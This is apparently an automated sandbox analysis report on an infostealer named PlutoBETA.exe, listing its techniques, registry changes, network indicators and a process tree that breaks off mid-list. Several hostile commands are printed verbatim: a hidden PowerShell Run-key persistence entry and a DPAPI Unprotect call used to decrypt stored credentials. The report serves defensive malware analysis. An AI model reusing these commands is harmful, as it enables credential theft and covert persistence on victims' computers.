dce8aa2451ab2695e3bc88e6a7aa6b4bc0caea02d9b20995a2a2ffba17094139

Resubmissions

17-05-2024 13:12

240517-qft5msac5z 10

17-05-2024 13:09

240517-qdv9xsac4s 10

Analysis

max time kernel
1792s
max time network
1797s
platform
windows10-2004_x64
resource
win10v2004-20240508-en
resource tags

arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
submitted
17-05-2024 13:09

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

PlutoBETA.2/PlutoBETA.exe
Size

37.6MB
MD5

529f707d764d2da27d2b8f982e5c3c37
SHA1

e4ab7395a54777c310259b975e6ccbd1cc934d37
SHA256

90473bef6e0137f9d543260dec681ee7ce0f0e833f4084b4d427c1fea3f49045
SHA512

67e551b165f02fabd406afaa5a88cf75aa69cec689b544d41d093656783828236813102cbab8d8868457eec070039d381fe544c9215d07f66730fe4e97ceef63
SSDEEP

393216:JQgHDlanaGBXvDKtz+bhPWES4tiNQPNrIKc4gaPbUAgrO4mgh96l+ZArYsFRl7du:J3on1HvSzxAMNhFZArYsSPvp7OZuF

Score

8^/10

execution persistence spyware stealer

Malware Config

Signatures

Blocklisted process makes network request 2 IoCs

Processes:

curl.execurl.exe

flow pid process

35 4572 curl.exe
48 1828 curl.exe

flow	pid	process
35	4572	curl.exe
48	1828	curl.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 11 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
1272	powershell.exe
3100	powershell.exe
2028	powershell.exe
2236	powershell.exe
1148	powershell.exe
2160	powershell.exe
3692	powershell.exe
1484	powershell.exe
4808	powershell.exe
1112	powershell.exe
4468	powershell.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

PlutoBETA.execscript.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-3558294865-3673844354-2255444939-1000\Control Panel\International\Geo\Nation	PlutoBETA.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3558294865-3673844354-2255444939-1000\Control Panel\International\Geo\Nation	cscript.exe

Loads dropped DLL 1 IoCs

Processes:

PlutoBETA.exe

pid process

60 PlutoBETA.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

pid	process
60	PlutoBETA.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

powershell.exereg.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-3558294865-3673844354-2255444939-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Powershell = "\"powershell.exe\" -WindowStyle Hidden -ExecutionPolicy Bypass -File \"C:\\Users\\Admin\\AppData\\Local\\Temp\\arAxjZFDGtCeIEg.ps1\""	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3558294865-3673844354-2255444939-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Steam = "C:\\Users\\Admin\\AppData\\Local\\Temp\\PlutoBETA.2\\PlutoBETA.exe"	reg.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service
T1102

Processes:

flow ioc

19 discord.com
29 discord.com
70 discord.com
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

20 api.ipify.org
An obfuscated cmd.exe command-line is typically used to evade detection. 2 IoCs

Processes:

cmd.execmd.exe

pid process

4188 cmd.exe
1620 cmd.exe

flow	ioc
19	discord.com
29	discord.com
70	discord.com

flow	ioc
20	api.ipify.org

pid	process
4188	cmd.exe
1620	cmd.exe

Drops file in System32 directory 7 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

description	ioc	process
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log	powershell.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task/Job
T1053

Processes:

schtasks.exe

pid process

3176 schtasks.exe

pid	process
3176	schtasks.exe

Detects videocard installed 1 TTPs 16 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

Processes:

WMIC.exeWMIC.exeWMIC.exeWMIC.exeWMIC.exeWMIC.exeWMIC.exeWMIC.exeWMIC.exeWMIC.exeWMIC.exeWMIC.exeWMIC.exeWMIC.exeWMIC.exeWMIC.exe

pid	process
4132	WMIC.exe
1152	WMIC.exe
2708	WMIC.exe
2480	WMIC.exe
1728	WMIC.exe
3284	WMIC.exe
1728	WMIC.exe
3192	WMIC.exe
2616	WMIC.exe
4700	WMIC.exe
1576	WMIC.exe
2260	WMIC.exe
1392	WMIC.exe
4436	WMIC.exe
4060	WMIC.exe
3956	WMIC.exe

Enumerates processes with tasklist 1 TTPs 2 IoCs

Process Discovery
T1057

Processes:

tasklist.exetasklist.exe

pid process

4348 tasklist.exe
2628 tasklist.exe

pid	process
4348	tasklist.exe
2628	tasklist.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.execscript.EXEpowershell.execscript.EXE

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	cscript.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script Host\Settings	cscript.EXE
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	cscript.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft	cscript.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe

Modifies registry key 1 TTPs 8 IoCs

Modify Registry
T1112

Processes:

reg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exe

pid process

696 reg.exe
3136 reg.exe
2332 reg.exe
2480 reg.exe
3672 reg.exe
4776 reg.exe
2088 reg.exe
4984 reg.exe

pid	process
696	reg.exe
3136	reg.exe
2332	reg.exe
2480	reg.exe
3672	reg.exe
4776	reg.exe
2088	reg.exe
4984	reg.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exePlutoBETA.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
3100	powershell.exe
3100	powershell.exe
2704	powershell.exe
2704	powershell.exe
3500	powershell.exe
3500	powershell.exe
3500	powershell.exe
4468	powershell.exe
4468	powershell.exe
4468	powershell.exe
3692	powershell.exe
3692	powershell.exe
3692	powershell.exe
3996	powershell.exe
3996	powershell.exe
3996	powershell.exe
1484	powershell.exe
1484	powershell.exe
1484	powershell.exe
4116	powershell.exe
4116	powershell.exe
4116	powershell.exe
4508	powershell.exe
4508	powershell.exe
4508	powershell.exe
3988	powershell.exe
3988	powershell.exe
3988	powershell.exe
1272	powershell.exe
1272	powershell.exe
1272	powershell.exe
4928	powershell.exe
4928	powershell.exe
4928	powershell.exe
4536	powershell.exe
4536	powershell.exe
4536	powershell.exe
3828	powershell.exe
3828	powershell.exe
3828	powershell.exe
4756	powershell.exe
4756	powershell.exe
4756	powershell.exe
2020	powershell.exe
2020	powershell.exe
2020	powershell.exe
60	PlutoBETA.exe
60	PlutoBETA.exe
3468	powershell.exe
3468	powershell.exe
3468	powershell.exe
60	PlutoBETA.exe
232	powershell.exe
232	powershell.exe
232	powershell.exe
4700	powershell.exe
4700	powershell.exe
4700	powershell.exe
4472	powershell.exe
4472	powershell.exe
4472	powershell.exe
3300	powershell.exe
3300	powershell.exe
3300	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exetasklist.exetasklist.exepowershell.exepowershell.exeWMIC.exeWMIC.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	3100	powershell.exe
Token: SeDebugPrivilege	4348	tasklist.exe
Token: SeDebugPrivilege	2628	tasklist.exe
Token: SeDebugPrivilege	2704	powershell.exe
Token: SeDebugPrivilege	3500	powershell.exe
Token: SeIncreaseQuotaPrivilege	680	WMIC.exe
Token: SeSecurityPrivilege	680	WMIC.exe
Token: SeTakeOwnershipPrivilege	680	WMIC.exe
Token: SeLoadDriverPrivilege	680	WMIC.exe
Token: SeSystemProfilePrivilege	680	WMIC.exe
Token: SeSystemtimePrivilege	680	WMIC.exe
Token: SeProfSingleProcessPrivilege	680	WMIC.exe
Token: SeIncBasePriorityPrivilege	680	WMIC.exe
Token: SeCreatePagefilePrivilege	680	WMIC.exe
Token: SeBackupPrivilege	680	WMIC.exe
Token: SeRestorePrivilege	680	WMIC.exe
Token: SeShutdownPrivilege	680	WMIC.exe
Token: SeDebugPrivilege	680	WMIC.exe
Token: SeSystemEnvironmentPrivilege	680	WMIC.exe
Token: SeRemoteShutdownPrivilege	680	WMIC.exe
Token: SeUndockPrivilege	680	WMIC.exe
Token: SeManageVolumePrivilege	680	WMIC.exe
Token: 33	680	WMIC.exe
Token: 34	680	WMIC.exe
Token: 35	680	WMIC.exe
Token: 36	680	WMIC.exe
Token: SeIncreaseQuotaPrivilege	4508	WMIC.exe
Token: SeSecurityPrivilege	4508	WMIC.exe
Token: SeTakeOwnershipPrivilege	4508	WMIC.exe
Token: SeLoadDriverPrivilege	4508	WMIC.exe
Token: SeSystemProfilePrivilege	4508	WMIC.exe
Token: SeSystemtimePrivilege	4508	WMIC.exe
Token: SeProfSingleProcessPrivilege	4508	WMIC.exe
Token: SeIncBasePriorityPrivilege	4508	WMIC.exe
Token: SeCreatePagefilePrivilege	4508	WMIC.exe
Token: SeBackupPrivilege	4508	WMIC.exe
Token: SeRestorePrivilege	4508	WMIC.exe
Token: SeShutdownPrivilege	4508	WMIC.exe
Token: SeDebugPrivilege	4508	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4508	WMIC.exe
Token: SeRemoteShutdownPrivilege	4508	WMIC.exe
Token: SeUndockPrivilege	4508	WMIC.exe
Token: SeManageVolumePrivilege	4508	WMIC.exe
Token: 33	4508	WMIC.exe
Token: 34	4508	WMIC.exe
Token: 35	4508	WMIC.exe
Token: 36	4508	WMIC.exe
Token: SeDebugPrivilege	4468	powershell.exe
Token: SeIncreaseQuotaPrivilege	680	WMIC.exe
Token: SeSecurityPrivilege	680	WMIC.exe
Token: SeTakeOwnershipPrivilege	680	WMIC.exe
Token: SeLoadDriverPrivilege	680	WMIC.exe
Token: SeSystemProfilePrivilege	680	WMIC.exe
Token: SeSystemtimePrivilege	680	WMIC.exe
Token: SeProfSingleProcessPrivilege	680	WMIC.exe
Token: SeIncBasePriorityPrivilege	680	WMIC.exe
Token: SeCreatePagefilePrivilege	680	WMIC.exe
Token: SeBackupPrivilege	680	WMIC.exe
Token: SeRestorePrivilege	680	WMIC.exe
Token: SeShutdownPrivilege	680	WMIC.exe
Token: SeDebugPrivilege	680	WMIC.exe
Token: SeSystemEnvironmentPrivilege	680	WMIC.exe
Token: SeRemoteShutdownPrivilege	680	WMIC.exe
Token: SeUndockPrivilege	680	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

PlutoBETA.execmd.exepowershell.execsc.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exe

description	pid	process	target process
PID 60 wrote to memory of 2160	60	PlutoBETA.exe	cmd.exe
PID 60 wrote to memory of 2160	60	PlutoBETA.exe	cmd.exe
PID 2160 wrote to memory of 4648	2160	cmd.exe	cmd.exe
PID 2160 wrote to memory of 4648	2160	cmd.exe	cmd.exe
PID 2160 wrote to memory of 3100	2160	cmd.exe	powershell.exe
PID 2160 wrote to memory of 3100	2160	cmd.exe	powershell.exe
PID 3100 wrote to memory of 4480	3100	powershell.exe	csc.exe
PID 3100 wrote to memory of 4480	3100	powershell.exe	csc.exe
PID 4480 wrote to memory of 3256	4480	csc.exe	cvtres.exe
PID 4480 wrote to memory of 3256	4480	csc.exe	cvtres.exe
PID 60 wrote to memory of 4232	60	PlutoBETA.exe	cmd.exe
PID 60 wrote to memory of 4232	60	PlutoBETA.exe	cmd.exe
PID 60 wrote to memory of 2708	60	PlutoBETA.exe	cmd.exe
PID 60 wrote to memory of 2708	60	PlutoBETA.exe	cmd.exe
PID 4232 wrote to memory of 2212	4232	cmd.exe	curl.exe
PID 4232 wrote to memory of 2212	4232	cmd.exe	curl.exe
PID 2708 wrote to memory of 4348	2708	cmd.exe	tasklist.exe
PID 2708 wrote to memory of 4348	2708	cmd.exe	tasklist.exe
PID 60 wrote to memory of 3636	60	PlutoBETA.exe	cmd.exe
PID 60 wrote to memory of 3636	60	PlutoBETA.exe	cmd.exe
PID 60 wrote to memory of 4188	60	PlutoBETA.exe	cmd.exe
PID 60 wrote to memory of 4188	60	PlutoBETA.exe	cmd.exe
PID 4188 wrote to memory of 2704	4188	cmd.exe	powershell.exe
PID 4188 wrote to memory of 2704	4188	cmd.exe	powershell.exe
PID 3636 wrote to memory of 2628	3636	cmd.exe	tasklist.exe
PID 3636 wrote to memory of 2628	3636	cmd.exe	tasklist.exe
PID 60 wrote to memory of 1620	60	PlutoBETA.exe	cmd.exe
PID 60 wrote to memory of 1620	60	PlutoBETA.exe	cmd.exe
PID 1620 wrote to memory of 3500	1620	cmd.exe	powershell.exe
PID 1620 wrote to memory of 3500	1620	cmd.exe	powershell.exe
PID 60 wrote to memory of 3604	60	PlutoBETA.exe	cmd.exe
PID 60 wrote to memory of 3604	60	PlutoBETA.exe	cmd.exe
PID 60 wrote to memory of 4592	60	PlutoBETA.exe	cmd.exe
PID 60 wrote to memory of 4592	60	PlutoBETA.exe	cmd.exe
PID 60 wrote to memory of 1216	60	PlutoBETA.exe	curl.exe
PID 60 wrote to memory of 1216	60	PlutoBETA.exe	curl.exe
PID 3604 wrote to memory of 680	3604	cmd.exe	WMIC.exe
PID 3604 wrote to memory of 680	3604	cmd.exe	WMIC.exe
PID 60 wrote to memory of 4416	60	PlutoBETA.exe	cmd.exe
PID 60 wrote to memory of 4416	60	PlutoBETA.exe	cmd.exe
PID 60 wrote to memory of 4792	60	PlutoBETA.exe	cmd.exe
PID 60 wrote to memory of 4792	60	PlutoBETA.exe	cmd.exe
PID 1216 wrote to memory of 3176	1216	cmd.exe	schtasks.exe
PID 1216 wrote to memory of 3176	1216	cmd.exe	schtasks.exe
PID 4592 wrote to memory of 3156	4592	cmd.exe	reg.exe
PID 4592 wrote to memory of 3156	4592	cmd.exe	reg.exe
PID 4416 wrote to memory of 4468	4416	cmd.exe	powershell.exe
PID 4416 wrote to memory of 4468	4416	cmd.exe	powershell.exe
PID 4792 wrote to memory of 4508	4792	cmd.exe	WMIC.exe
PID 4792 wrote to memory of 4508	4792	cmd.exe	WMIC.exe
PID 60 wrote to memory of 5044	60	PlutoBETA.exe	cmd.exe
PID 60 wrote to memory of 5044	60	PlutoBETA.exe	cmd.exe
PID 5044 wrote to memory of 3416	5044	cmd.exe	cscript.exe
PID 5044 wrote to memory of 3416	5044	cmd.exe	cscript.exe
PID 60 wrote to memory of 3652	60	PlutoBETA.exe	cmd.exe
PID 60 wrote to memory of 3652	60	PlutoBETA.exe	cmd.exe
PID 3652 wrote to memory of 2588	3652	cmd.exe	WMIC.exe
PID 3652 wrote to memory of 2588	3652	cmd.exe	WMIC.exe
PID 60 wrote to memory of 2320	60	PlutoBETA.exe	getmac.exe
PID 60 wrote to memory of 2320	60	PlutoBETA.exe	getmac.exe
PID 2320 wrote to memory of 3936	2320	cmd.exe	WMIC.exe
PID 2320 wrote to memory of 3936	2320	cmd.exe	WMIC.exe
PID 2320 wrote to memory of 4980	2320	cmd.exe	WMIC.exe
PID 2320 wrote to memory of 4980	2320	cmd.exe	WMIC.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\PlutoBETA.2\PlutoBETA.exe
"C:\Users\Admin\AppData\Local\Temp\PlutoBETA.2\PlutoBETA.exe"
1⤵
- Checks computer location settings
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:60

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "type .\temp.ps1 | powershell.exe -noprofile -"
2⤵
- Suspicious use of WriteProcessMemory
PID:2160

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" type .\temp.ps1 "
3⤵
PID:4648

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -noprofile -
3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3100

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\dhjd5vjv\dhjd5vjv.cmdline"
4⤵
- Suspicious use of WriteProcessMemory
PID:4480

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES47D6.tmp" "c:\Users\Admin\AppData\Local\Temp\dhjd5vjv\CSC94A25C3DBBC24965A2ECB09070605D9C.TMP"
5⤵
PID:3256

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
2⤵
- Suspicious use of WriteProcessMemory
PID:4232

C:\Windows\system32\curl.exe
curl http://api.ipify.org/ --ssl-no-revoke
3⤵
PID:2212

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
2⤵
- Suspicious use of WriteProcessMemory
PID:2708

C:\Windows\system32\tasklist.exe
tasklist
3⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:4348

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
2⤵
- Suspicious use of WriteProcessMemory
PID:3636

C:\Windows\system32\tasklist.exe
tasklist
3⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:2628

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,158,56,123,155,119,128,226,65,189,77,45,80,19,37,26,47,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,143,8,155,162,221,184,73,71,232,222,51,145,193,115,97,9,130,241,224,103,6,120,76,14,50,215,61,172,124,159,238,253,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,99,253,1,12,244,37,76,196,250,204,121,176,50,84,44,171,164,192,123,43,73,12,147,211,193,42,15,39,95,26,62,201,48,0,0,0,199,59,41,134,72,150,192,161,125,143,33,114,13,155,6,139,72,133,43,120,135,38,24,218,101,6,176,207,210,73,64,67,238,175,209,152,192,141,196,93,4,159,79,39,108,201,81,243,64,0,0,0,47,182,203,76,22,230,198,116,189,169,35,195,147,254,206,160,141,223,22,83,122,129,208,253,101,155,106,250,254,105,139,55,133,60,233,210,239,137,168,177,165,144,32,46,241,126,232,206,117,88,178,220,23,105,81,227,111,16,111,158,78,1,233,96), $null, 'CurrentUser')"
2⤵
- An obfuscated cmd.exe command-line is typically used to evade detection.
- Suspicious use of WriteProcessMemory
PID:4188

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,158,56,123,155,119,128,226,65,189,77,45,80,19,37,26,47,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,143,8,155,162,221,184,73,71,232,222,51,145,193,115,97,9,130,241,224,103,6,120,76,14,50,215,61,172,124,159,238,253,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,99,253,1,12,244,37,76,196,250,204,121,176,50,84,44,171,164,192,123,43,73,12,147,211,193,42,15,39,95,26,62,201,48,0,0,0,199,59,41,134,72,150,192,161,125,143,33,114,13,155,6,139,72,133,43,120,135,38,24,218,101,6,176,207,210,73,64,67,238,175,209,152,192,141,196,93,4,159,79,39,108,201,81,243,64,0,0,0,47,182,203,76,22,230,198,116,189,169,35,195,147,254,206,160,141,223,22,83,122,129,208,253,101,155,106,250,254,105,139,55,133,60,233,210,239,137,168,177,165,144,32,46,241,126,232,206,117,88,178,220,23,105,81,227,111,16,111,158,78,1,233,96), $null, 'CurrentUser')
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2704

C:\Windows\system32\cmd.exe
